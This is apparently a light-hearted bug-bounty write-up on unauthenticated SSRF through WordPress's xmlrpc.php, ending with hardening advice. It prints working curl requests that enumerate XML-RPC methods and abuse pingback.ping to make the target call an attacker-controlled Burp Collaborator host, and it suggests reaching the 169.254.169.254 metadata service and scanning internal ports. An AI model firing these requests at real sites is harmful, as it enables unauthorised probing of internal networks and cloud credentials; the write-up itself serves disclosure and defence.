🛰️ So… I Made a Server Call Me Back. Unauthenticated SSRF via XML-RPC
One fine evening, while sipping coffee stronger than my will to live, I accidentally made a server talk to me. Literally.
☕ The Setup: XML-RPC aka WordPress’s Forgotten Child
Ever stumble upon a file named xmlrpc.php and think, “Oh look, a rusty gate to the backend world”?
That’s exactly what I thought. And like every other bored hacker with caffeine in their blood, I poked it using curl.
Request:
curl -X POST https://target.com/xmlrpc.php \
-H "Content-Type: text/xml" \
--data '<?xml version="1.0"?><methodCall><methodName>demo.sayHello</methodName><params></params></methodCall>'Response:
<methodResponse>
<params>
<param><value><string>Hello!</string></value></param>
</params>
</methodResponse>Server said hello. I said: “Nice to meet you, let’s be friends… maliciously.” 😈
🔍 Enumerating Methods Like a Nosy Neighbor
Naturally, I wanted to know what tricks this server had.
Request:
curl -X POST https://target.com/xmlrpc.php \
-H "Content-Type: text/xml" \
--data '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName><params></params></methodCall>'Response:
A giant list of methods dropped like:
pingback.ping
metaWeblog.newPost
wp.uploadFile
blogger.deletePost
wp.getUsers
...When you realize the server knows more methods than you do in Python.
🚨 The Vulnerability That Hit Different: pingback.ping
So what does pingback.ping do?
Well, it lets the server make a request to another URL.
Imagine calling your friend to check if someone linked your blog — now imagine your friend is a vulnerable server that calls any URL you give it.
So I handed it a very harmless link (my Burp Collaborator domain).
Payload:
curl -X POST https://target.com/xmlrpc.php \
-H "Content-Type: text/xml" \
--data '<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://attacker.burpcollaborator.net</string></value></param>
<param><value><string>https://target.com/blog/hello-world</string></value></param>
</params>
</methodCall>'📡 And It Responded… Loudly
My Burp Collaborator popped off like:
- ✅ DNS Lookup from one IP
- ✅ HTTP request from another IP
- ✅ Extra DNS queries from a third
Bro, the server was working harder than me on a Monday morning.
😱 Impact: Why You Shouldn’t Trust Strangers
With this unauthenticated SSRF (Server-Side Request Forgery), I could:
- Port scan internal services like a nosy neighbor
- Try to reach metadata services (
http://169.254.169.254) - Abuse it to pivot further
- Chain it with more vulnerabilities (like RCE, who knows!)
All without logging in. Just plain XML and desperation.
🔒 Recommendations (aka How to Make Your Server Less Friendly)
- Disable
pingback.pingunless you really need it - Block
xmlrpc.phpentirely if unused - Use allowlists on outbound HTTP requests
- Monitor internal traffic like you monitor memes during work
🧑💻 Researcher Behind the Chaos
Hi, I’m Mayank aka AIwolfie.
I break things ethically, automate recon, and drink coffee like it’s a legal drug (which it is… for now).
You can catch my tools and chaos here: https://github.com/AIwolfie
☕ Final Thoughts
If your server still supports XML-RPC in 2025, and especially pingback.ping, it’s basically saying:
“I’m open to conversations… even with attackers.”
Patch up. Audit your WordPress setups. And never underestimate old endpoints with long names.
Also: drink your coffee. The bugs won’t find themselves.
